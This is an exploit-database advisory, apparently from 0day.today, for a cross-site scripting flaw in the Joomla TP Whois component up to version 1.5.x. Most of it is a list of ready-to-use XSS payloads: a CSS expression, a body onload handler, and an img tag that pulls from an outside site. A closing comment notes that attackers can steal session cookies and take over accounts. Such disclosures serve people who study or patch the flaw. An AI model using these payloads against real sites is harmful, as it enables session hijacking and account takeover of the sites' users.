id: 10068
date: 12/03/2009
title: Joomla Component TP Whois <= 1.5.x XSS
author: andresg
cves: 

======================================
Joomla Component TP Whois <= 1.5.x XSS
======================================

########################################################################
# Example1: %3C/xss/*-*/style=xss:e/**/xpression(alert(andresg888))%3E
# Example2: </textarea>
# Example3: <body+onload=alert(401784509139)>
# Example4:
# Example4: <img+src=http://www.ilegalintrusion.net/yo.gif+onload=alert(andresg888)>
# Example5:
########################################################################
# Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable
# application to fool a user in order to gather data from them. An attacker can steal the
# session cookie and take over the account.
# It is obvious that with a little of imagination malicious users can hack the site.
########################################################################



#  0day.today [2023-03-22]  #